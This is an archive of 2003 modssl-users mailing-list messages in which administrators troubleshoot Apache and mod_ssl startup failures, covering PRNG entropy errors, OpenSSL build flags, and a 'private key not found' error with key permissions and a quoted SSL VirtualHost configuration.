> > installed the server, no problem.  Then I wanted to start the httpd 
> > server, even without mod_ssl.
> >
> > ./apachectl -k start
> >
> > There is no message on the screen, but an error message in the log 
> > file. The apache engine did not start.
> >
> > [warn] Init: PRNG still contains insufficient entropy! [error] Init:

> > Failed to generate temporary 512 bit RSA private key Configuration 
> > Failed
> >
> > Any suggestions.
> >
> > - Ming Yu 
> >
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> > User Support Mailing List
modssl-users@modssl.org
> > Automated List Manager
majordomo@modssl.org
> >
>
>
> --
> Ian Miller
> Sr. Systems Engineer
> University of Chicago
> imiller@bsd.uchicago.edu 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 17:30:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6EAC12AA027; Fri,  7 Mar 2003 17:30:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from huggins.bsd.uchicago.edu (huggins.bsd.uchicago.edu [128.135.182.72])
	by master.modssl.org (Postfix) with ESMTP id 783C02AA01F
	for ; Fri,  7 Mar 2003 17:29:58 +0100 (CET)
Received: from huggins.bsd.uchicago.edu (localhost [127.0.0.1])
	by huggins.bsd.uchicago.edu (8.12.8/8.12.8) with ESMTP id h27GOlhg011631;
	Fri, 7 Mar 2003 10:24:47 -0600 (CST)
Received: (from nobody@localhost)
	by huggins.bsd.uchicago.edu (8.12.8/8.12.8/Submit) id h27GOkES011630;
	Fri, 7 Mar 2003 10:24:46 -0600 (CST)
X-Authentication-Warning: huggins.bsd.uchicago.edu: nobody set sender to imiller@bsd.uchicago.edu using -f
Received: from bast.bsd.uchicago.edu (bast.bsd.uchicago.edu [128.135.182.36]) 
	by webemail.bsd.uchicago.edu (IMP) with HTTP 
	for ; Fri,  7 Mar 2003 10:24:46 -0600
Message-ID: <1047054286.3e68c7cec352b@webemail.bsd.uchicago.edu>
Date: Fri,  7 Mar 2003 10:24:46 -0600
From: Ian Miller 
To: modssl-users@modssl.org, apachep2 
Cc: modssl-users@modssl.org
Subject: RE: Apache 2.0.44 with Openssl -0.9.7
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.2
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Miller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I just run config with ./configure
                       --enable-ssl 
                       --with-ssl=/usr/local/ssl 
                       --enable-so 
                       --enable-rewrite
                       --enable-speling
solairs 9 & 8 systems 
gcc 3.2.2 
gnu binutils 2.13.2.1

I think I had a problem once ... 
I just recompiled ssl and ran the make check or make test 
everything worked then

Quoting apachep2 :

> Of course. When you build mod_ssl into apache (that is STATIC), you
> won't encounter X509_free issue.
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Yu, Ming
> Sent: March 7, 2003 10:57 AM
> To: 'modssl-users@modssl.org'
> Subject: RE: Apache 2.0.44 with Openssl -0.9.7
> 
> I use the following switches to compile APACHE 2.0.44 with OpenSSL 0.9.7
> ./configure --enable-layout=TEST \
> 		--enable-ssl \
> 		--with-ssl=/usr/local/ssl \
> 		--enable-mods-shared=max \
> 		--enable-modules=most \
> 		--with-mpm=worker
> 
> It went through the installation process. 
> 
> Thanks 
> 
> - Ming Yu
> 
> -----Original Message-----
> From: Ted Rolle [mailto:ted@php.net] 
> Sent: Friday, March 07, 2003 10:36 AM
> To: modssl-users@modssl.org
> Subject: Re: Apache 2.0.44 with Openssl -0.9.7
> 
> 
> YOU GOT Apache-2.0.44 and OpenSSL-0.9.7 WORKING???
> What are your ./configure files like?  I keep getting the dreaded "can't
> find X509_free" message.
> 
> On Fri, 7 Mar 2003, Ian Miller wrote:
> 
> >
> > Did you uncomment out the entropy lines in the ssl.conf file? I am 
> > running it with 0.9.7a and it works fine -Ian
> > Quoting "Yu, Ming" :
> >
> > > Does anyone have problem with apache 2.0.44 and Openssl 0.9.7. I 
> > > installed the server, no problem.  Then I wanted to start the httpd 
> > > server, even without mod_ssl.
> > >
> > > ./apachectl -k start
> > >
> > > There is no message on the screen, but an error message in the log 
> > > file. The apache engine did not start.
> > >
> > > [warn] Init: PRNG still contains insufficient entropy! [error] Init:
> 
> > > Failed to generate temporary 512 bit RSA private key Configuration 
> > > Failed
> > >
> > > Any suggestions.
> > >
> > > - Ming Yu 
> > >
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > > User Support Mailing List
> modssl-users@modssl.org
> > > Automated List Manager
> majordomo@modssl.org
> > >
> >
> >
> > --
> > Ian Miller
> > Sr. Systems Engineer
> > University of Chicago
> > imiller@bsd.uchicago.edu 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


-- 
Ian Miller
Sr. Systems Engineer
University of Chicago
imiller@bsd.uchicago.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 20:16:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EB1EC2AA027; Fri,  7 Mar 2003 20:16:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 2639D2AA020
	for ; Fri,  7 Mar 2003 20:16:20 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 049CF807A6
	for ; Sat,  8 Mar 2003 15:41:21 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Sat, 8 Mar 2003 15:41:21 -0600
User-Agent: KMail/1.4.3
References: <200303071542.00371.aputnam@pelathe.org> <200303071620.31307.aputnam@pelathe.org> <030501c2e41d$a1186430$9f05a8c0@rgedyew2k>
In-Reply-To: <030501c2e41d$a1186430$9f05a8c0@rgedyew2k>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303081541.21567.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm not sure what you mean. I followed the mod_ssl faq to generate all th=
e=20
key/csr/crt files, then $./sign.sh the server.csr to make the server.crt.

 /etc/httpd/ssl.key/server.key is the correct path and the file is there.=
 I=20
finally managed to chmod it to 0400. (I got confused to what rw-r--r-- wa=
s=20
vs. r--------). However, the result was still the same.=20

I've since remade the keys, thinking that also might be a problem. Everyt=
hing=20
was running smoothly until I got to the final step, (using the $./sign.sh=
 on=20
server.csr). It generated an error that I believe I also got the first ti=
me I=20
made the keys a couple weks ago (unfortunately I wasn't paying enough=20
attention):

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
CA verifying: server.crt <-> CA cert
server.crt: /C=3DUS/ST=3DKansas/L=3DLawrence/O=3DPelathe=20
Center/CN=3Dwww.pelathe.org/Email=3Dtkitchen@pelathe.org
error 18 at 0 depth lookup:self signed certificate
/C=3DUS/ST=3DKansas/L=3DLawrence/O=3DPelathe=20
Center/CN=3Dwww.pelathe.org/Email=3Dtkitchen@pelathe.org
error 7 at 0 depth lookup:certificate signature failure

What is an 'error 18 at depth 0' and an 'error 7 at depth 0'? Would this =
be a=20
reason why my server cannot find the Private Key?

Thank you everyone for all of your help so far. I really do appreciate it=
=2E I=20
know I must sound pretty foolish with these questions, so thanks. I'd bak=
e=20
you all a cake if I could.




On Thursday 06 March 2003 14:19, Ron Gedye wrote:
> How did you generate the CSR to get the cert?  What key file did you us=
e
> for this?
>
> The cert (crt) file perms look ok, (444 would be better) but who owns i=
t?
>
> does this file exist?
> /etc/httpd/ssl.key/server.key (according to your conf)
>
> if so, the permissions should be
> -r-----
>
> This file should be owned by root (in most all cases) and not the webse=
rver
> account (nobody/apache).
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Friday, March 07, 2003 4:20 PM
> Subject: Re: private key not found
>
>
> The permissions for the server.crt file are rw-r--r-- but it still cann=
ot
> find
> the Private Key.
>
> On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> > Please check the permissions on your private key.  They should be
> > readable only by owner (400)
> >
> > (knee-jerk first guess reaction)
> >
> > Best of luck
> >
> > ----- Original Message -----
> > From: "A. Putnam" 
> > To: 
> > Sent: Friday, March 07, 2003 3:42 PM
> > Subject: private key not found
> >
> >
> > I'm trying to get mod_ssl to work on my server, but each time I try t=
o
> > restart
> > apache with mod_ssl activated, it gives me this error:
> >
> > /etc/init.d/apache start returned 7 (Program is not running.)
> > Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> > Phrase Dialog)
> > Some of your private key files are encrypted for security reasons.
> > In order to read them you have to provide us with the pass phrases.
> >
> > Server matrix.pelathe.org:443 (RSA)
> > Enter pass phrase:
> > Apache:mod_ssl:Error: Private key not found.
> > **Stopped
> > stty: standard input: Inappropriate ioctl for device
> > ..failed
> >
> > What I don't understand is how it can't find the Private key. The
> > SSLCertificateKeyFile path in httpd.conf matches the location of the =
key
>
> in
>
> > my directory. Isn't the SSLCertificateKeyFile the Private Key path?
> >
> > I'm including the Virtual Host code (sans the explination text and a
> > passkey).
> > I'm very new to this so I won't be surprised if there is a glaring er=
ror
>
> in
>
> > here that I missed...
> >
> > 
> >
> > DocumentRoot "/srv/www/htdocs"
> > ServerName matrix.pelathe.org
> > ServerAdmin tkitchen@pelathe.org
> > ErrorLog /var/log/httpd/error_log
> > TransferLog /var/log/httpd/access_log
> >
> > SSLEngine on
> >
> > SSLCipherSuite
> > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> >
> > SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> > #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
> >
> > SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> > #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
> >
> > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> >
> > #SSLCACertificatePath /etc/httpd/ssl.crt
> > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> >
> > SSLCARevocationPath /etc/httpd/ssl.crl
> > #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
> >
> > SSLVerifyClient require
> > SSLVerifyDepth  10
> >
> > #
> > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > #            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
> > #            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       )=
 \
> > #           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
> > #
> >
> > #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequ=
ire
> > 
> >     SSLOptions +StdEnvVars
> > 
> > 
> >     SSLOptions +StdEnvVars
> > 
> >
> > SetEnvIf User-Agent ".*MSIE.*" \
> >          nokeepalive ssl-unclean-shutdown \
> >          downgrade-1.0 force-response-1.0
> >
> > CustomLog /var/log/httpd/ssl_request_log \
> >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> >
> > 
> >
> > Any help would be greatly appreciated. I'm using Apache 1.3.26 and
> > Mod_SSL 2.8.10 on a SuSE 8.1 box.
> >
> > Thanks,
> > -Andrew
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g
> >
> >
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 20:23:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D33B22AA027; Fri,  7 Mar 2003 20:23:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 47B752AA01F
	for ; Fri,  7 Mar 2003 20:23:44 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id EEFDF807A6
	for ; Sat,  8 Mar 2003 15:48:45 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Sat, 8 Mar 2003 15:48:45 -0600
User-Agent: KMail/1.4.3
References: <200303071542.00371.aputnam@pelathe.org> <200303071620.31307.aputnam@pelathe.org> <00b101c2e41b$82407ef0$6700a8c0@WKSJustin>
In-Reply-To: <00b101c2e41b$82407ef0$6700a8c0@WKSJustin>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303081548.45720.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm not too sure what you mean when you ask if the domain was transferred=
=2E=20
What domain? All I know I did was that I generated the key/csr/crts and=20
self-signed the CA.

On Thursday 06 March 2003 14:03, Justin Williams wrote:
> was the domain moved over to your server, or did you generate key/csr/c=
rt?
>
> I'm having the same difficulty with one where the domain, cert and key =
were
> transferred; all my others work properly...
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Friday, March 07, 2003 5:20 PM
> Subject: Re: private key not found
>
>
> The permissions for the server.crt file are rw-r--r-- but it still cann=
ot
> find
> the Private Key.
>
> On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> > Please check the permissions on your private key.  They should be
> > readable only by owner (400)
> >
> > (knee-jerk first guess reaction)
> >
> > Best of luck
> >
> > ----- Original Message -----
> > From: "A. Putnam" 
> > To: 
> > Sent: Friday, March 07, 2003 3:42 PM
> > Subject: private key not found
> >
> >
> > I'm trying to get mod_ssl to work on my server, but each time I try t=
o
> > restart
> > apache with mod_ssl activated, it gives me this error:
> >
> > /etc/init.d/apache start returned 7 (Program is not running.)
> > Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> > Phrase Dialog)
> > Some of your private key files are encrypted for security reasons.
> > In order to read them you have to provide us with the pass phrases.
> >
> > Server matrix.pelathe.org:443 (RSA)
> > Enter pass phrase:
> > Apache:mod_ssl:Error: Private key not found.
> > **Stopped
> > stty: standard input: Inappropriate ioctl for device
> > ..failed
> >
> > What I don't understand is how it can't find the Private key. The
> > SSLCertificateKeyFile path in httpd.conf matches the location of the =
key
>
> in
>
> > my directory. Isn't the SSLCertificateKeyFile the Private Key path?
> >
> > I'm including the Virtual Host code (sans the explination text and a
> > passkey).
> > I'm very new to this so I won't be surprised if there is a glaring er=
ror
>
> in
>
> > here that I missed...
> >
> > 
> >
> > DocumentRoot "/srv/www/htdocs"
> > ServerName matrix.pelathe.org
> > ServerAdmin tkitchen@pelathe.org
> > ErrorLog /var/log/httpd/error_log
> > TransferLog /var/log/httpd/access_log
> >
> > SSLEngine on
> >
> > SSLCipherSuite
> > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> >
> > SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> > #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
> >
> > SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> > #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
> >
> > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> >
> > #SSLCACertificatePath /etc/httpd/ssl.crt
> > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> >
> > SSLCARevocationPath /etc/httpd/ssl.crl
> > #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
> >
> > SSLVerifyClient require
> > SSLVerifyDepth  10
> >
> > #
> > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > #            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
> > #            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       )=
 \
> > #           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
> > #
> >
> > #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequ=
ire
> > 
> >     SSLOptions +StdEnvVars
> > 
> > 
> >     SSLOptions +StdEnvVars
> > 
> >
> > SetEnvIf User-Agent ".*MSIE.*" \
> >          nokeepalive ssl-unclean-shutdown \
> >          downgrade-1.0 force-response-1.0
> >
> > CustomLog /var/log/httpd/ssl_request_log \
> >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> >
> > 
> >
> > Any help would be greatly appreciated. I'm using Apache 1.3.26 and
> > Mod_SSL 2.8.10 on a SuSE 8.1 box.
> >
> > Thanks,
> > -Andrew
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g
> >
> >
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 20:38:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AB6ED2AA027; Fri,  7 Mar 2003 20:38:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vopmail.pshift.com (mail.pshift.com [63.166.217.30])
	by master.modssl.org (Postfix) with ESMTP id 9BEF62AA01F
	for ; Fri,  7 Mar 2003 20:38:40 +0100 (CET)
Received: from WKSJustin (unverified [63.166.217.49]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Fri, 7 Mar 2003 14:33:39 -0500
Message-ID: <008101c2e4e1$2ea1ded0$6700a8c0@WKSJustin>
From: "Justin Williams" 
To: 
References: <200303071542.00371.aputnam@pelathe.org> <200303071620.31307.aputnam@pelathe.org> <00b101c2e41b$82407ef0$6700a8c0@WKSJustin> <200303081548.45720.aputnam@pelathe.org>
Subject: Re: private key not found
Date: Fri, 7 Mar 2003 14:38:51 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I had a domain that was transferred to my server, and with it came the key
and crt files from the old server.  That particular domain the SSL is
blowing up...  More accurately, Apache refuses to start, with the same error
you get, when I try to enable the SSL for that domain...

----- Original Message -----
From: "A. Putnam" 
To: 
Sent: Saturday, March 08, 2003 4:48 PM
Subject: Re: private key not found


I'm not too sure what you mean when you ask if the domain was transferred.
What domain? All I know I did was that I generated the key/csr/crts and
self-signed the CA.

On Thursday 06 March 2003 14:03, Justin Williams wrote:
> was the domain moved over to your server, or did you generate key/csr/crt?
>
> I'm having the same difficulty with one where the domain, cert and key
were
> transferred; all my others work properly...
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Friday, March 07, 2003 5:20 PM
> Subject: Re: private key not found
>
>
> The permissions for the server.crt file are rw-r--r-- but it still cannot
> find
> the Private Key.
>
> On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> > Please check the permissions on your private key.  They should be
> > readable only by owner (400)
> >
> > (knee-jerk first guess reaction)
> >
> > Best of luck
> >
> > ----- Original Message -----
> > From: "A. Putnam" 
> > To: 
> > Sent: Friday, March 07, 2003 3:42 PM
> > Subject: private key not found
> >
> >
> > I'm trying to get mod_ssl to work on my server, but each time I try to
> > restart
> > apache with mod_ssl activated, it gives me this error:
> >
> > /etc/init.d/apache start returned 7 (Program is not running.)
> > Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> > Phrase Dialog)
> > Some of your private key files are encrypted for security reasons.
> > In order to read them you have to provide us with the pass phrases.
> >
> > Server matrix.pelathe.org:443 (RSA)
> > Enter pass phrase:
> > Apache:mod_ssl:Error: Private key not found.
> > **Stopped
> > stty: standard input: Inappropriate ioctl for device
> > ..failed
> >
> > What I don't understand is how it can't find the Private key. The
> > SSLCertificateKeyFile path in httpd.conf matches the location of the key
>
> in
>
> > my directory. Isn't the SSLCertificateKeyFile the Private Key path?
> >
> > I'm including the Virtual Host code (sans the explination text and a
> > passkey).
> > I'm very new to this so I won't be surprised if there is a glaring error
>
> in
>
> > here that I missed...
> >
> > 
> >
> > DocumentRoot "/srv/www/htdocs"
> > ServerName matrix.pelathe.org
> > ServerAdmin tkitchen@pelathe.org
> > ErrorLog /var/log/httpd/error_log
> > TransferLog /var/log/httpd/access_log
> >
> > SSLEngine on
> >
> > SSLCipherSuite
> > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> >
> > SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> > #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
> >
> > SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> > #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
> >
> > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> >
> > #SSLCACertificatePath /etc/httpd/ssl.crt
> > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> >
> > SSLCARevocationPath /etc/httpd/ssl.crl
> > #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
> >
> > SSLVerifyClient require
> > SSLVerifyDepth  10
> >
> > #
> > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
> > #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
> > #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
> > #
> >
> > #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire
> > 
> >     SSLOptions +StdEnvVars
> > 
> > 
> >     SSLOptions +StdEnvVars
> > 
> >
> > SetEnvIf User-Agent ".*MSIE.*" \
> >          nokeepalive ssl-unclean-shutdown \
> >          downgrade-1.0 force-response-1.0
> >
> > CustomLog /var/log/httpd/ssl_request_log \
> >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> >
> > 
> >
> > Any help would be greatly appreciated. I'm using Apache 1.3.26 and
> > Mod_SSL 2.8.10 on a SuSE 8.1 box.
> >
> > Thanks,
> > -Andrew
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org

--
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 21:36:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 78AA42AA037; Fri,  7 Mar 2003 21:36:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id E51462AA02C
	for ; Fri,  7 Mar 2003 21:36:49 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 8874F807A6
	for ; Sat,  8 Mar 2003 17:01:51 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Sat, 8 Mar 2003 17:01:51 -0600
User-Agent: KMail/1.4.3
References: <200303071542.00371.aputnam@pelathe.org> <200303081548.45720.aputnam@pelathe.org> <008101c2e4e1$2ea1ded0$6700a8c0@WKSJustin>
In-Reply-To: <008101c2e4e1$2ea1ded0$6700a8c0@WKSJustin>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303081701.51160.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Oh, I see now. Well, it's nothing like that. Pelathe has had its domain s=
ince=20
'98. We've had a sever that died and had to transfer everything to a new=20
Linux box, but this is the first time we've ever tried to make a ssl serv=
er,=20
so I don't think that would make a difference.=20

It's really strange that the crt for your transferred domain won't work=20
though. Maybe there is some fundamental difference between the two server=
s=20
that would cause problems? Can you just make new keys for the domain inst=
ead?=20
Or is that not how it works?



On Friday 07 March 2003 13:38, Justin Williams wrote:
> I had a domain that was transferred to my server, and with it came the =
key
> and crt files from the old server.  That particular domain the SSL is
> blowing up...  More accurately, Apache refuses to start, with the same
> error you get, when I try to enable the SSL for that domain...
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Saturday, March 08, 2003 4:48 PM
> Subject: Re: private key not found
>
>
> I'm not too sure what you mean when you ask if the domain was transferr=
ed.
> What domain? All I know I did was that I generated the key/csr/crts and
> self-signed the CA.
>
